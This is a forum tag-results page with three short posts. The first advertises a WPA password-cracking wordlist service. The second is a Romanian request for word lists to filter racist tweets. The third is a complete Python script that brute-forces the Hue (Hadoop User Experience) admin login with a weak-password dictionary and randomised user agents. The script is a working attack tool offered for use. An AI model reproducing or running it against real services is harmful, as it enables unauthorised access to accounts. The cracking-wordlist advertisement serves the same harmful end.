Search the Community
Showing results for tags 'words'.
-
We invite you to test wpa-plc.com . More than three billion words for less than 2 usd. Best WPAPLC
-
Va rog frumos, daca stie cineva, sa imi spuna unde pot gasi bag of words pentru fitrarea tweets. Am nevoie pentru un proiect. Ma intereseaza cuvinte care pot ajuta la filtrare pentru gasirea oamenilor care posteaza pe twitter mesaje raciste sau care incita la revolta. Am cautat pe diferite siteuri, teze de doctorat si nu am gasit asa ceva. Va multumesc mult!
-
Hadoop User Experience password cracking script. Written in Python. #!/usr/bin/python import sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", Source